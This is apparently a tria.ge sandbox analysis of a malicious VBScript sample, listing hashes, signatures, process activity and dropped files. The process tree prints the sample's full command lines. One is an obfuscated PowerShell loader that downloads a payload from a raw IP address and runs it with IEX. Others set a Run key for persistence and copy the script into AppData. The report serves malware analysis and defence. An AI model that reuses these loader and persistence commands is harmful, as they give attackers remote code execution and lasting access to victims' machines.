Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

425d9a1f5e...18.vbs

windows7-x64

10

425d9a1f5e...18.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    135s
  • max time network
    105s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/05/2024, 17:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs

  • Size

    9KB

  • MD5

    425d9a1f5eb07f8ba4ed354c757bb72e

  • SHA1

    c96f2b98374f7e2328f1e1ab80eed15fb6048198

  • SHA256

    92a44d57e21fb7eb09cd897249ae3d2b3822f05f86846f9d3dfe9f750e96b362

  • SHA512

    c68e905289f1c6311b32084e55015adb97451a183aa4c228f320957b4b2fccaf6a4fa930d880632e03d44d77e8ab5fb51014cf33c0cdafae1c5e179faf51ab86

  • SSDEEP

    96:5W9ZUDRCWmCqm9RYs8A3CNiLUB2cZmNwMwGgSe3OhTy/33s1l/S:0ulhc0222zGgJ3OhTy/cS

Score
10/10
persistence

Malware Config

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs"
    1⤵
      PID:1420
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal cM1 $c145;$suXMbuGywgFCLg=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32,36,84,98,111,110,101,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,112,50,50,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,112,50,50,59,36,116,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,116,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,49,56,53,46,50,52,50,46,49,48,53,46,49,49,54,47,117,116,110,108,47,65,116,116,97,99,107,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,116,46,115,101,110,100,40,41,59,36,116,121,61,36,116,46,114,101,115,112,111,110,115,101,84,101,120,116,59,36,97,115,99,105,105,67,104,97,114,115,61,32,36,116,121,32,45,115,112,108,105,116,32,39,45,39,32,124,70,111,114,69,97,99,104,45,79,98,106,101,99,116,32,123,91,99,104,97,114,93,91,98,121,116,101,93,34,48,120,36,95,34,125,59,36,97,115,99,105,105,83,116,114,105,110,103,61,32,36,97,115,99,105,105,67,104,97,114,115,32,45,106,111,105,110,32,39,39,124,77);[char[]]$suXMbuGywgFCLg -join ''|c`M`1
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:996
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value 'C:\Users\Admin\AppData\Local\Microsoft\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs'
      1⤵
      • Process spawned unexpected child process
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3168
    • C:\Windows\system32\cmd.exe
      cmd /c copy "C:\Users\Admin\AppData\Local\Temp\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs" "C:\Users\Admin\AppData\Local\Microsoft\" /Y
      1⤵
      • Process spawned unexpected child process
      PID:1220

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Powershell.exe.log
      Filesize

      2KB

      MD5

      6cf293cb4d80be23433eecf74ddb5503

      SHA1

      24fe4752df102c2ef492954d6b046cb5512ad408

      SHA256

      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

      SHA512

      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      d4ff23c124ae23955d34ae2a7306099a

      SHA1

      b814e3331a09a27acfcd114d0c8fcb07957940a3

      SHA256

      1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

      SHA512

      f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_evung3eq.3lh.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/996-0-0x00007FFD7B553000-0x00007FFD7B555000-memory.dmp

      Filesize

      8KB

      Download

    • memory/996-1-0x00007FFD7B550000-0x00007FFD7C011000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/996-2-0x000002AB52BB0000-0x000002AB52BD2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/996-23-0x00007FFD7B550000-0x00007FFD7C011000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/996-29-0x00007FFD7B550000-0x00007FFD7C011000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/996-33-0x00007FFD7B550000-0x00007FFD7C011000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3168-24-0x00007FFD7B550000-0x00007FFD7C011000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3168-25-0x00007FFD7B550000-0x00007FFD7C011000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3168-28-0x00007FFD7B550000-0x00007FFD7C011000-memory.dmp

      Filesize

      10.8MB

      Download